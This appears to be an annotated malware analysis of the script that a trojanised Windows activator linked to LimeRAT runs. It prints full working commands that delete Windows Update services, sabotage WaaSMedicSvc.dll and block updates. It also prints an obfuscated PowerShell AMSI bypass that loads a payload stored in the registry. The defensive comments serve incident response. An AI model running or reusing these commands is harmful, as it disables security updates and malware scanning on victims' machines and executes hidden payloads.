
[[LimeRAT trojan]] Winker / Spark Windows Activator — commands executed by the activator (NOT a removal procedure). The batch lines below stop and delete the Windows Update services, rename WaaSMedicSvc.dll, set update-blocking policies and disable the related scheduled tasks; the final PowerShell line patches AmsiScanBuffer in memory and then loads a payload stored in the registry value HKLM\SOFTWARE\dialerstager. Read each line as a change that has to be reversed on an infected host, and as a host-based indicator that the activator ran.

rem --- Stage 1: take Windows Update out of action ------------------------------
rem NOTE(review): despite the page title nothing in this block removes anything;
rem these are the commands the activator itself runs. A defender should read
rem them as the list of changes to undo and as host-based indicators.
rem Stop the update stack: Update Orchestrator, WaaS Medic (the self-repair
rem service for Windows Update), Windows Update, BITS and Delivery Optimization.
sc stop UsoSvc
sc stop WaaSMedicSvc
sc stop wuauserv
sc stop bits
sc stop dosvc
rem Delete the service definitions outright (/f = no prompt). This is not a
rem "disable": once the keys are gone the services no longer exist and a plain
rem "sc start" cannot bring them back; expect a component repair (DISM or an
rem in-place upgrade) to be needed. Missing keys for these five names under
rem CurrentControlSet\Services are a reliable sign that this script has run.
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
rem Neutralise the WaaS Medic DLL so the Medic service cannot be re-created or
rem repair the update stack: take ownership, grant Everyone (SID S-1-1-0) full
rem control (icacls /t /c /l /q: recurse, continue on error, act on the link
rem itself, quiet), then rename the binary. WaaSMedicSvc_BAK.dll sitting in
rem System32 is an indicator; restoring the DLL means renaming it back AND
rem resetting its owner/ACL, since Everyone:F was granted on it.
takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll
icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll
rem Pin the Windows Update policy values so updating stays off even if the
rem services are restored: AUOptions=2 (documented as notify-before-download),
rem AutoInstallMinorUpdates=0, NoAutoUpdate=1, NoAutoRebootWithLoggedOnUsers=1.
rem On a machine that is not domain/MDM managed these values should not exist
rem under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU at all, so
rem their presence is itself an indicator; remove the values to undo this step.
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
rem Disable the scheduled tasks that would otherwise restart the update
rem machinery (WindowsUpdate and UpdateOrchestrator task folders). Re-enable
rem each with "SCHTASKS /Change /TN <name> /ENABLE" during cleanup.
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

rem Repeat of the icacls grant above (same DLL, same Everyone:F permission); it
rem is redundant, and this time the path is hard-coded to C:\Windows instead of
rem the SystemRoot variable. Note the DLL was already renamed two steps earlier,
rem so on a normal install this command has nothing to act on.
icacls  C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q 

rem --- Stage 2: AMSI bypass and staged payload load ----------------------------
rem NOTE(review): this is the loader, not a removal step. 32-bit PowerShell
rem (the SysWOW64 copy) runs an inline script that does the following:
rem  1. defines a helper (uVloTgFhZlij) that builds delegate types at runtime
rem     with Reflection.Emit, so native functions can be invoked through
rem     GetDelegateForFunctionPointer without Add-Type or a compiled stub;
rem  2. resolves GetModuleHandle and GetProcAddress from the non-public
rem     Microsoft.Win32.UnsafeNativeMethods class inside System.dll; every API
rem     and module name is split into string fragments ('Ams'+'iSc'+'an'+...),
rem     apparently to defeat simple string matching on the command line;
rem  3. LoadLibraryA's amsi.dll, VirtualProtect's the first 8 bytes of
rem     AmsiScanBuffer to PAGE_READWRITE (4), overwrites them with
rem     b8 57 00 07 80 c2 18 00 - on x86 that decodes to mov eax,0x80070057
rem     (E_INVALIDARG) / ret 0x18 - and restores PAGE_EXECUTE_READ (0x20).
rem     Every subsequent AMSI scan in this process reports failure instead of a
rem     verdict, so whatever is loaded next is not inspected;
rem  4. reads the value "dialerstager" under HKLM\SOFTWARE, treats its bytes as
rem     a .NET assembly, loads it with Assembly.Load and invokes its entry point.
rem Indicators: the registry value HKLM\SOFTWARE\dialerstager (this IS the
rem staged payload - export it for analysis before deleting it), and a SysWOW64
rem powershell.exe whose command line contains DefineDynamicAssembly,
rem GetDelegateForFunctionPointer, VirtualProtect or split 'amsi' fragments.
rem Script-block logging would capture the de-obfuscated names at run time.
rem The command appears to have been wrapped by the paste at "...uVloTgFhZlij "
rem / "@([IntPtr],..."; in a real .cmd it has to be a single physical line.
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:uVloTgFhZlij{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hZoxNFljRapLPB,[Parameter(Position=1)][Type]$ZUdgkPnljG)$tbBBUAzXmVo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$tbBBUAzXmVo.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hZoxNFljRapLPB).SetImplementationFlags('Runtime,Managed');$tbBBUAzXmVo.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZUdgkPnljG,$hZoxNFljRapLPB).SetImplementationFlags('Runtime,Managed');Write-Output $tbBBUAzXmVo.CreateType();}$JzfARGytmCFRp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NOrFjfpVbHbkYq=$JzfARGytmCFRp.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lMTIEQZCYYaUuCbhxkE=uVloTgFhZlij @([String])([IntPtr]);$gpuVBVoFPOsSXHQsCwtdSe=uVloTgFhZlij 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rcpwKvUOaFj=$JzfARGytmCFRp.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$mXmsIcxOnRlHtJ=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$rcpwKvUOaFj,[Object]('Load'+'LibraryA')));$AqTzBSIQsksrUzcow=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$rcpwKvUOaFj,[Object]('Vir'+'tual'+'Pro'+'tect')));$tdMZuAJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mXmsIcxOnRlHtJ,$lMTIEQZCYYaUuCbhxkE).Invoke('a'+'m'+'si.dll');$vmKiPAnYKfLXkoNxb=$NOrFjfpVbHbkYq.Invoke($Null,@([Object]$tdMZuAJ,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wORJDOKjEA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AqTzBSIQsksrUzcow,$gpuVBVoFPOsSXHQsCwtdSe).Invoke($vmKiPAnYKfLXkoNxb,[uint32]8,4,[ref]$wORJDOKjEA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$vmKiPAnYKfLXkoNxb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AqTzBSIQsksrUzcow,$gpuVBVoFPOsSXHQsCwtdSe).Invoke($vmKiPAnYKfLXkoNxb,[uint32]8,0x20,[ref]$wORJDOKjEA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"